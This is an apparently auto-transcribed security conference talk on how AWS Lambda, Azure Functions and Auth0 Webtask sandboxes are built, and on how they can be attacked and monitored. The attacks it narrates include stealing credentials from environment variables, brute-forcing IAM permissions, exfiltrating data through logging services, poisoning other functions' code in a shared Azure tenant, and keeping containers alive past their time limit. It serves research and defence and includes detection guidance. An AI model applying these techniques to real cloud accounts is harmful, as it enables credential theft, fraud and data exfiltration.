
so let's talk about service compute how many people use service compute in some form or another today Wow about half the room so if you don't use service compute today we're talking about sort of pure service offerings that you write some code you upload it to a sandbox of some kind you don't get a lot of visibility into how that code is executed and you get the return of that code there's other things that people label as server less like sqs or s3 we're not talking about those so these are what people refer to as ephemeral runtimes which means that they sort of come into being your code executes and then that that environment sometimes it's container is
gone shortly thereafter so why use the service thing at all the primary reason that most people go to service compute is actually parallelism because in an environment like AWS lambda more or less you have nearly infinite scale fan-out pattern style programming is very easy and most programming models for it are event-driven and you can hook automatic events up to other things in your cloud environment in theory this has more security features than your standard thick server high availability is really simple largely because you as a consumer don't have to manage it it has enforce architecture patterns and little to no management for your ops team so another way I like to put that though is that server list is really
hope by you right you're putting a lot of trust in the vendor to sort of do all the right things and I don't always necessarily like to trust vendors but we hope some set of things about the these service environments these are kind of the rules of server lists that we believe should always be true we hope there are code executes securely we hope that people can't tamper with the execution of that code we hope that the vendor is patching the underlying operating system we hope that our code hasn't been modified in transit the sandbox and we hope that this is somehow actually more secure than running our own servers because maybe we're actually pretty good at that
sometimes so the things I hope you'll take away from this talk is how different vendors implement their sandbox so this is isolation technology really attack patterns and techniques for persisting in various environments and how to build your own test tools to sort of hack around in the sandbox this is the hacking part of the talk most importantly I hope that you'll walk away sort of answering the question should you use this at all or should you avoid it entirely so things you won't learn in this talk because I didn't do them is kernel level exploits I don't have any you also won't see a container escape to the AWS hypervisor because if I had done
that I would be selling it somewhere and not talking here so we'll look at some Python in this because python is a primary language I write in we'll look at a little bit of nodejs which makes me sad and we'll also look at some I am policy docs a quick favor though you need to remember that when we talk about the initial attack vector for the environments it's that it's bad code so we assume some sort of contrived vulnerability initially to get into the environment because we assume that at some point you will make a mistake and some bad code will get introduced into your environment and you will have sqli or an RCE because this happens despite your best
efforts all your static analysis all your quality controls someday this will happen to you the question is how bad does it get like how dangerous is serverless compute when one of those RCEs is actually introduced so before we get into that let's look at who sells the serverless thing everybody like pretty much every vendor that has an interest in cloud has an interest in service because all these vendors get together they compete with each other and they seem to think that this is the future the way that we will interact with computer sources so Google compute engine has Google compute functions Asher has Asher functions AWS had the first market offering which is AWS lambda IBM vens this project
called Apache open whisk which is actually pretty neat and then there's a couple small vendors in the space the most notable of which is 0 who has an engine called web tasks so what do people use serverless for probably nothing critical right it's brand-new hasn't been around a long time the answer is they pretty much use it for everything so kind of on the low risk side a lot of slack bots are written in serverless frameworks and on the high risk side you have things like oz0 who is using the web task engine to provide open ID connect and sam'l authentication for consumers and their public and private cloud environments so while I was working on this talk my boss tweeted
at me that somebody had actually figured out how to run docker containers and userland inside of lambda as well so this is kind of the moral of the story here is that if you can figure out a way to sort of misappropriate a technology to do a thing you can do it and this was kind of my response to that which is why would you even want to do that because I think we already frankly have enough abstraction in these environments from an auditing and dfi our perspective because we have containers now running in server love sand boxes running in sandbox containers running in virtual machines on compute hosts all in the cloud and as somebody who started their
career in DF IR this makes me nervous for some reason I can't imagine why so when I started working in IT this is what a server look like you know kind of like look like c-3po and sometimes they restart when they misbehave you turned it off and on again this is loads more complex and so I wanted to know what is the attack surface really of these things and when they're breached what are the potential pivots and persistence methods so the attack surface is primarily in two places right it said code execution time and in code pipeline so this is like a code corruption style attack so the the first way we aren't going to talk about much the code
pipeline attacks because if you can own the code where it lives in github or something you pretty much own the environment anyway that's not very interesting but I do want to mention it because there's kind of a hot topic in InfoSec right now which is this concept of sub-domain takeovers and this is largely because of the way that technologies like Amazon s3 work where you might go in s3 and allocate an s3 bucket to do a thing and the name might be ABC XYZ comm and if you delete that bucket somebody can immediately reallocate it with the same name and then if they were storing source code in there and there's some other set of things chained to it
they can potentially pollute your deployment pipeline inside of the confines of their own account so this is a problem when you publish all your code totally in the open and these kind of attacks really do happen in the wild so the other way that you can attack this is actually at runtime which is far more interesting right so this is the concept in this diagram I have a web app represented you're actually attacking through Amazon API gateway into the lambda sandbox and then depending on how lacks the iam policies are and we know that people are bad at AWS I am they're getting better but it's still really hard you can pivot to other things in the environment from that
sandbox so maybe that's not very interesting it's kind of all the usual attack techniques but it's kind of interesting because people are forklifting existing application workflows sort of similar to when we made the transition from data center to ec2 initially now we're making a transition from ec2 and we're taking those apps just like the docker container ID and we're shoving them into service so maybe there's some some unique considerations here that we need to know about so there's two things we're primarily concerned with when we talk about attacks on service environments and their persistence and data exfiltration and this goes back to all the things that we hope are true about service compute the most notable of which is
that we believe as consumers that these sand boxes get thrown away at the end of their life we have to be able to take it to the bank that this happens in order to trust the environment we also believe because these are server lists that they have maximum execution runtimes and that should always be true - so an AWS lambda the limit for code execution is five minutes supposed to go five minutes if your code goes five point zero one minutes it should die whether it's done or not and then it should go away so five minutes is a lot of time if you have the right type of attack right you can do a lot of things in the
environment programmatically in five minutes that's an issue and before we dive into what those things are let's talk about a couple other terms so term number one is cold start so this is what happens when you first execute some code inside of a service environment the provider Amazon Azure DCP has to allocate some compute resources to you they have to stream the code down to that container and load it so this takes a little bit of time it's about a half a second penalty each time that you have a cold start and so providers introduce this feature called warmness in the name of performance which is that if you invoke a function multiple times that code will actually
stay on the compute host that was executing it and you may or may not be returned the same container so on subsequent executions if they happen in a certain time window so you can kind of see where I'm going with this maybe so the first person to talk about this warmness versus cold start concept was rich jones and he actually writes a service framework called the Zappa framework and this framework pretty much allows you to take a flask app or a django app and more or less forklifted into AWS lambda without having to modify the underlying application so he was doing a lot of work in lambda and he gives a great talk called gone in 60
milliseconds about data exfiltration you should check it out I linked it in the slides so these environments have two attack surfaces they have the outer attack surface and inner attack surface on the outter attack surface side we have AWS API gateway this is kind of a black box reverse proxy you don't really get a lot of visibility into how it does what it does it costs four dollars a month to have it in your environment and it hooks up all of the routes to the underlying application on the inside you have the actual AWS lambda functions and then under that you have some set of other services which are kind of the chocolaty Center that as an attacker you
want to be able to go and take over those other services for your exfiltration or persistence so when you're scanning for these things in the cloud the way that you identify that it's a service app might be based on things like HTTP headers there are some dead giveaways that something is running inside of AWS lambda this isn't like a smoking gun necessarily but you can look for the header X a.m. z CF ID which just pretty much indicates that something is coming from cloud front but API gateway also discloses that information so you can say maybe this is lambda on the off zero side of things in the web task engine it actually identifies itself in
a header as web tasks and on the azure side it's just a is so we don't actually get any disclosure maybe it's intentional maybe it's not but no smoking gun there on the azure side you can also do some recon on github to see what apps are being deployed in service there's a popular framework called the serverless framework surprise it has a config file server Lestat yamo you can see there's quite a lot of results here you can sort of dig in and see how people are constructing their apps and where they're deploying them so when you find the serverless apps what do you do with them I didn't know the answer to that so I wanted to kind of dig around
and see what was possible inside of that each execution environment and so I went out and I actually looked at the vendor Docs to see if any vendor was super transparent about the way they allocated resources and put together their sandbox environments and I didn't really find anything so most vendors consider their service technology to be super secret proprietary sauce right they won't even it's a docker container but we can know that it's a docker container by sort of poking at it a bit and seeing if it behaves like a docker container because if it looks like a duck and it quacks like a duck it's probably a duck so I personally have a problem with using
things that I can't understand which is why I love open source software right I can always rip open the code and know how it works so I started writing some code in Python that I would deploy into these environments that would literally run OS shell out commands and learn things about the environment and this was based on another project by a guy by the name of Eric Hammond who wrote a web shell wrapper and no js' there's executes bash commands so I started kind of evolving this until I had a bunch of checks that would more or less try to know all the things about the environment was it Linux what was the kernel version what
kind of processors did it have how much memory if it was Python what were the Python packages what were the versions are they up to date how long was the host alive how long was a container alive what's a networking like can i exfiltrate data through a NAT gateway and so I built all these checks up here's kind of like the list of things I primarily wanted to know though based on an analysis for that data I wanted to know is this a regular operating system like rel or CentOS or Windows if so are the general things about that OS true or has it been modified by the vendor in a way that's proprietary to make it more
secure which sort of led me to ask can I read and write everywhere in the operating system if I can can I poison my code by an RCE can I modify the actual code that's loaded into the runtime can I get in set environment variables and are the permissions in the cloud too permissive or just right and what about Internet egress because if I just get any internet access I want that makes it really easy for me to just do one data burst of any set of data that I got and make that kind of hard to detect and you know slip away with lots of great data so this is a little bit in the
cloud like playing operation right so I totally don't advise that you do this until you have a frank conversation with your vendor that you're gonna audit their environment because depending on what you're doing and what vendor it is you will trigger their actual automated user protection and you'll get kind of a cease-and-desist noticed and so I work with Azure and AWS and ethereal pretty tightly during this project so if you're interested in doing this I can connect you with the right people so I looked at lambda asher and author your web tasks I'm actually in the process right now of also doing this for Google compute engine but that data will not be publicly available until January so if
you follow me on my website you can get that data at the end of the year let's talk about lambda first because lambda is kind of the easiest it's the longest lived service runtime we know a few things from the research of other people not necessarily from public vendor Docs we know it's some kind of container based system we know it runs on Amazon Linux big surprise there Amazon Linux is just a rel derivative it has a read-only file system code is injected into VAR run task code execute as a non root user there's a single AWS I emeral accessible to the sandbox reverse shells are not possible because of AWS nat gateway magic somebody
tweeted at me to correct me on this point there is a way to get reverse shells in lambda but it assumes a lot of custom configuration it's really hard so I'm going to stand by that statement that under normal circumstances you can't get reverse shells in lambda and you can get Internet egress and in some cases by default your functions do have internet egress so I wanted to know if I could steal the credentials where the credentials inside of these functions special in any way and if I can how bad does it get where can i persist code when I do attack it and how long can i persist code and then can I get lambda
to do things other than execute code in the language I prefer to use so this is kind of like a two stage attack I get an RC e I stream down an arbitrary binary that maybe does some nasty or things should lambda prevent the execution of that and how frequently lastly does the OS get patched because you know we know patch management is kind of a hot topic because Equifax so I won't dive into the sample output here because the internet access in this room is really terrible and frankly I'm terrified to leave my slides but this is a blob of descriptive JSON just picture the most descriptive JSON about the sandbox that you can
think of in your mind so this is what the container structure looks like from my analysis of that JSON right it's it just a regular Linux file system connected to AWS API gateway to code streams down there's a magic file that nobody talks about in here called bootstrap Pi which has tons of juicy stuff that I could have spent a long time analyzing but this is how Amazon does x-ray this is how they talk to other proprietary things in Amazon to instrument the container and lastly it's also how they hook up whether it's Python or nodejs so that files kind of interesting you can dig into that there's also /a to be OS lambda directory and then down at the bottom
there there's only one writable directory in the whole thing which is slash temp which is actually a ram disk so if you slide little slider in lambda and you allocate 512 makes of Ram it will actually make a slash temp partition that's 512 megs and that's the only place in the container that you can persist and then on the side there are how the credentials are delivered some things in AWS use the metadata proxy service if you're familiar with that it spins up a web server on 169.254 169.254 these don't have that you can't access the metadata service all the creds are delivered as environment variables which are just temporary session tokens that are valid for an hour so that's how the
creds live in the container so given these limits because the attack surface is really really small the container is really really limited as an attacker you can kind of laser focus on how you're going to design a piece of serverless malware right your initial payload needs to be as small as possible because maybe you can only get it into the sandbox via API gateway there's maximum forget put post requests potentially you need to persist it in temp attempts really small maybe 512 megs in a lot of cases maybe 128 and others you need to be able from inside of your malware to assess lateral movement in the environment as fast as you can if you can't pivot you need to
just die because maybe you're going to be detected and you need to exfiltrate your results to somewhere else as quickly as you can before the container exits and dies so in other words your attack needs to be bigger on the inside so there's some great ways to do this in Python so python minification is a thing so you can write Python you can run it through Python minna fire that basically takes all of your Python and it kind of cross compiles it to totally like non human understandable Python lambda statements and smashes all the whitespace out of it so that's one way you can get your Python really small even supports inline compression and then when you're building your Python to
do reconnaissance you probably want to know what you can do so inside AWS lambda you get the boat oh three library for free which is AWS interface to all of its api's and so this is kind of an example of how you might write some Python that would brute out the permission as to whether that function can create cloud watch log grooves which is probably a great way to exfiltrate data if you can do that just to create a cloud watch log group put your your stolen data to cloud watch logs and then pick it up later from some other service or a subsequent execution of the function and so I wrote a bunch of samples of this and there's a github
just in here with kind of a reconnaissance script that I use there's also a Python module called one-liner Iser that will take any Python script and turn it into one totally unintelligible line this works great if you want to make circle smaller I didn't make circle smaller that I have to share with you but boy that sure would've been cool maybe next year so in summary you have two techniques with lots of payload packing and if I was writing service malware that's probably how I do it instead I decided to build an app that was horrible and just sort of attack it by hand so I wrote a slack bot because we'll use slack for a lot of things and
that slack BOTS primary job was to take a web hook from github send a notification to a channel and then allow a user to ask a question of that slack bot about commit messages but I put a vulnerability into that slack bot that allows you to get a string escape and execute arbitrary code and so I have a little demo of that this is what the normal behavior will look like this is what the bad behavior will look like you can see I have the slack bot sort of vomiting creds back into the channel from some code injection and you can escalate the behavior of that but the video to sort of tells a story a little
bit better
so let's fast-forward to the juicy stuff this is me making fun of my co-presenter at blackhat in the slack Channel while I'm performing the attack so there's the commit message that says hey somebody committed some stuff to github this is normal behavior and you can ask it to go get the changelog for you and you can inline a file name between some sort of templating style language and so this is me asking it to do the regular thing go get the changelog and copy that into the channel look there's the change lock that was ASCII Star Wars but slack does not honor ASCII and so this is just me validating that it actually did go out and get the
changelog so again me making fun of my co-presenter and so there's the vulnerability it calls a OS thought P open and it does a shell out instead of using native Python read facilities so kind of unsafe
so this is me in lining just the list command in there to validate that it actually works and boom yay I know I can do stuff so now what else can I get lots of juicy stuff is maybe if I'm route definitely not route I'm SPX user which is the regular user for AWS lamda dead giveaway I know from other stuff and things that environment variables or where the creds live and so I get the credits okay and so then I want to know stuff and things about those creds so I just copy them into my regular boto profile and once they're in my regular boto profile I try to call s3 with them and I can't because this is a hard and I
am policy but this validates that the creds do work outside the sandbox I can know who I am and then I can run Daniel gresling AWS pone to see all the other stuff that I can do so this is a script that you can run locally that just goes through and it will brood out all the permissions more or less by just trying every permission in every service one at a time and recording whether it was authorized or unauthorized now that's a really noisy very stupid attack if you actually care about somebody not noticing you but you can do that
so you can also get artifacts out this is me basically proving that you can post to other places on the Internet so I I wrote that test to see if I could create log streams and then report the status back to yet another service function so using server lists to collect data about hacking service so it's server list inception the attack surface of these kind of attacks becomes larger with bad I am and the issue here is really frameworks so this is new technology right we're still making a lot of custom tooling around making it easy for developers to interact with and a lot of the frameworks like Zappa and Apex framework do not make good iam
policies so this is the default policy of a Zappa deployment and if you know much about AWS policies maybe you don't know much about AWS policies all you really need to know is the more stars there are the worse it is and this has a lot of stars so the IM struggle is really really real my boss likes to say that I am an AWS is the killer feature and the killer feature so detection is also kind of difficult here on premise we have a lot of mature facilities for seeing if our environment is been breached we have network tabs we have audit D we have syslog shipping other sim functions in the cloud we basically have cloud watch
logs in AWS and anything else that we do to instrument our own applications and so if I have one piece of advice about this it's that if you're designing an application for server lace don't leave your time machine in the garage like make really heavy use of cloud watch logs and actually have developers write sane log into the app that proves that it's behaving normally because you don't really have a ton of native instrumentation in the environment so oh I did my demo early for the bad slack bot app so just pretend that it happened here and everything went really smooth so when I did that demo of the slack bot app I had cloud watch logs turned on and you can
see that there's some abnormal things that end up in cloud watch logs if I'm using them there are definitely lots of great indicators of compromised for the environment here so besides just the fact that I had shell come in my cloud watch log I had anomalous execution times for those functions so one of the things that AWS cloud watch gets natively so it gets the execution time that it took for a function so you can definitely in some cases average that and you can know if it's within a standard deviation of the mean right and anything that's outside of you know maybe like 1.25 you should trigger an alert on high error rates are a dead
giveaway that something's gone wrong and cloud trail high denials for the role in lambda it's another sort of smell test that somebody might have exfiltrated some credentials and is doing bad things this is what the cloud trail event looks like for deny cloud trail deny events do not surface in the regular AWS cloud trail interface you don't see them unless you look at cloud trail in cloud watch or you look at the raw data so a lot of people that I talked to don't even know that cloud trail logs denials but it totally does and you can use this so bottom line about lambda is that it's only as bad as your I am and AWS cases and you can
detect it through cloud watch log delivery but your mean time to respond is about seven to 10 minutes in a best-case because of the way that cloud watch logs bubble up in the environment so now let's talk about Azure functions a sure unsurprisingly runs on Windows it has a set of functions grouped within what they refer to as apps because it is windows and windows is built in a very specific way the file system in these is largely writable it does not have internet egress everything runs as non-root all functions in the same app share a system or tenant all functions in the same app execute as the same user app code is loaded into a root in a
drive that's called D that's attached code gets injected into an is root unsurprisingly some secrets are stored in data functions secrets and that's going to come into play later how as you're sort of mismanages those secrets so i wanted to know the same questions i asked about lambda and since all these things unlike lambda I get deployed on to the same tenant how could I use that functionality to maybe do bad things to a single app so a couple other tidbits about a sure they do publicly disclose is that you don't get WMI access and get event log list does return objects but not in the way that you think they actually send all the windows event logs to dev null for
some reason so in digging around I use the same programmatic shell wrapper as before it's a less ephemeral system so it means I have more tools at my disposal potentially azor does open source this sandbox to its credit it's available but in the Microsoft developer Network documentation they don't actually say that they open source it they actually open source it under a code name called product kudu and they don't really marry those Doc's together to make it easy for you to know you can run PowerShell in the environment we all know that InfoSec people love PowerShell and that greatly reduces the pain of understanding how the environment is put together so in order to demonstrate this
my colleague who is not here co-presenting with me created a vulnerable app concept that was supposed to be a credit card matching api and it does very much work like a credit card matching api and it's composed of a few different functions that are single responsibilities that are designed to do things like accept credit card numbers charge someone and then build them at the end of the month so it is written in nodejs and so we introduced a little vulnerability here that allows you to execute some arbitrary code and get a function to return before the it's intended to Asher's credit this when a function does return early it raises a red flag in the log but it still does
execute all the way to completion here's the indicator that a function has returned returned early it'll say error done has already been called please check your script for extraneous calls to done that is a smoking gun that means somebody got RCE in your function so if you're a visual learner all the functions live on the same tenant and any function inside of that tenant can by default list all functions that run on the tenant so immediately you have API access if you gain a foothold and a low privilege function to know what the other functions are you can change API keys from inside one function for any function on the same tenant so this is
bad you can change the triggering method methods of other functions so let's say that you have a credit card matcher app and some of the things are event based from a REST API and you have a billing function that's supposed to send bills out every month you can change that billing function to run on an event trigger instead or run every minute and lastly which I will show you in an ask you know my demo you can actually from a low privilege function poisson the code of a higher privilege function so I think I'm running a little bit behind here so I'm just gonna skip to the juicy stuff which is changing the source code
of the function here we go internet access is hard oh yay there we go so what you're gonna see on screen before I actually click the play button on this is a a post with curl that will cause the billing function to say that my credit card bill instead of being what the normal charge is is one dollar and the way that it will do that is by hitting a low privilege function with an RCE it will list all the functions it will ask for the API key for the high privilege billing function and then that API key will be encrypted but since all the functions run on the same tenant and Azure is perhaps not as mature in their
I am model I can actually just very nicely ask as your kms to decrypt that API key for me and it will return me the key and then I can use that to access the high privileged function so at the when when this happens even though it will be unseen say tional you need to clap for my co-presenter who is not here there it goes I've got the bill back now I'm gonna patch the billing code to always return one dollar and then I'm going to ask it what the charge is at the very end and it should say one dollar so yes the bill on the left there 1 2 3 4 5 6 7 8 9 0 1
2 3 4 5 6 is now one dollar and the other charge has been moved to another credit card number all of the code for this is totally public by the way so you can deploy this in Azure and you can play around with it yourself if you want to test the IO C's out or you want to test the API key thing all right moving right along so takeaways from that having separate API keys is great but once you're in one function you have access to all the other API keys so you might as well not have many it's only inconvenient for you be aware of the choices that you're making by putting functions in the same
app I actually think this is a bad piece of advice that's given for a feature that was intended to work this way so the default blueprint is for all your functions to deploy in one tenant if you want to work around this don't deploy all your functions in one tenant if they have separate security boundaries you can make this secure it's not that hard you just it'll cost you more money but when you're talking about running functions for a fraction of a cent if it cost you point 0:02 cents instead of 0.0001 who really cares so the last vendor I'm going to talk about is off zero offs your web task is probably the smallest run time I looked at web task
is to Ozzie Rose credit totally open source it runs in docker containers on core OS they are very transparent about that it allegedly runs nodejs only there's no restriction on internet egress this is because of the nature of how azio works they are a identity provider and it would be very hard for an identity provider to have compute environments that could not talk to other things on the internet it's used it's used inside of the Osseo rule engine and lots of other stuff like github webhook based applications it has public and private tenants you can give them lots of extra money to run your own instance of it so at first I thought oh man it
runs nodejs I have to re-implement all my code that mines the sandbox in node and that sucks but then my coworker actually figured out that you could just circumvent the actual native sandbox protection that prevented you from calling other things by just launching subprocesses and so yay he wrote a web shell for me to use his Twitter handle is kingster Iser and if you think this is cool you should go follow him on Twitter cuz he tweets about lots of other neat things he's French that's a French name by the way I won't even try to say his actual name it's Guillaume and so that's the output of the web shell running inside the sandbox
and so now I didn't have to do much right because I could get the sandbox to do whatever I want I could also run Python in the sandbox so once I can exact child processes I pretty much found out I can do all the things and so we've had a couple other things where we are digging around in here one of which is a raw socket that's mounted inside the container is a shared docker boolean and that was interesting so I'm going to show you a quick process demo and so this demonstrates that auth0 does not follow one of the rules of sandbox sandboxes which is that we believe that sandbox is die at the end
of their maximum execution time
I lost my web tasks session it is definitely not web's web task comm we are so lucky that that was a benign site
the tubes are slow today
so it has a nice IDE you know I'm sort of dancing up here waiting for this to load or you can just write the node.js like right in the browser all right so now we can pass arbitrary arguments and so if I type something that actually like Forks a process to the background and sticks like Python that would pop the Python interpreter the sandbox will just stick on the tenant until another process comes and sweeps it away so just by forking a process I can keep this container alive longer than the intended execution period which is lame
[Music] sometimes this works and sometimes it doesn't to run PS because it associates something with my IP
there so that's proof two tabs Python still running in this if I just sit here and refresh up that one died so maybe they've improved this but if you watch the blackhat demo this totally works I swear alright ops your learnings I left my slide that came back has to work for processes hang the container maybe they don't need more back-channel talk is a socket that is a rest endpoint likely for credential exchanges during off I didn't poke at that too much sandbox is escapable to the container sandbox system is Debian with little anomaly detection or monitoring during the entire time that I did super noisy things in here including running several docker exploits I didn't trigger their automated
protection which is a little unsettling and so I decided to kind of start a project to put this all together all this data this profiling so I had the server showdown project which is all those things I gather from Python lots of tests it matters because as consumers we need to know when the environment changes we need to know how often the vendor patches because there's no such thing as a patch feed for serverless sandboxes and it allows us to really keep the vendors honest with us as consumers and sometimes it'll give us clues when new features are coming out because you'll see new environment variables for NDA services kind of popping into these containers before
they're actually publicly released I don't know how you could use that financially profit so I decided to make a project called the service Observatory Mozilla we love things that do observatory stuff and things and this is not a Mozilla project but we have the web observatory and it inspired me to make the service observatory which is still not done by the way because I am a busy guy but if this is something that you're interested in being a first-time or many time open source contributor to I would love to collaborate with you it is actually a project with an API allows you to sign up and send profiles to this and then it will run a bunch of tests on
the profile and SCOR the serverless sandbox and i made this in an abstract way so that it can run in any container environment so you could really use this to test any serverless engine out there and get back an A through F grade based on some opinions that I have that are actually derived from the docker cis benchmark so if you think this is cool sign up for my mailing list on threat response cloud that's my website for the open source project that I presented here last year and the year before yeah so how did the security feature stack up across vendors this is a cool slide to tweet this is how all the vendors
implement the controls I think are most important so none of them are strict the language that's executing this is bad only some of them have read-only file systems all of them actually to their credit do patch very frequently AWS has the most granular I am AWS is the only one that you can deploy functions that don't have internet egress none of them have immutable environment variables and that's not really the vendors fault that's just kind of the way their operating systems work so if you want to give something back to the world give a PR to the Linux kernel that makes environment variables no longer writable sometimes I hear this is an impossible problem to solve because things and
almost all of them have some kind of warmness concept so if I could ask the vendors to do things for me in this magical world where I can get all of Amazon to deliver me a feature what would I ask for I would ask for any control that requires out of sandbox levels of access to implement so that would include things like native code signing protection so if I use PK I to sign my code I don't want it to execute if it's not mine I'd like a mutable environment variable so I know it's hard but you know they have lots of employees I'd like the ability to choose cold-start in favor of security so that warmness
capability we talked about that's in favor of performance if I don't need it I'd like to be able to choose to turn it off maybe I'd even like to pay less for that I'd like the ability to kill any process that's not executing in the language that the runtime has selected automatically and I'd like more transparency in the patch cycle and trade secrets of the run time because the more things I know is a consumer the better choices I can make about the risk of running things in that environment so should you use this probably it's probably still better than startup size to OPSEC or something and being able to lead on a vendor for this is is still
good in most cases but you can limit the blast radius of these attacks you can use event-driven security in Amazon like cloud watch events cloud trail and automated response like the project I make threat response remember that name threat response threat response threat response I make an auto I our pipeline for this stuff so I'll leave you with this one last quote before I take a few questions which is that modern security does not resemble high walls or strong doors but rather bells on strings that ring each time an attacker moves forward so all these people contributed to my project there's actually a couple people here today that contributed to my project my boss Jeff Breiner and Danny
Hartnell from Mozilla both were contributors to this profiling project I could never have done this alone it was a ton of work and also my co-presenter Graham Jones who works for a Portland based company legit script was my co-presenter at blackhat and he did the lion's share of the Azure research so I got to mention him so vendors were really nice - thank you to them and now I'll take questions I'll be in the hall and I'm also running the CTF come find me if you want to talk about general cloud stuff and things
you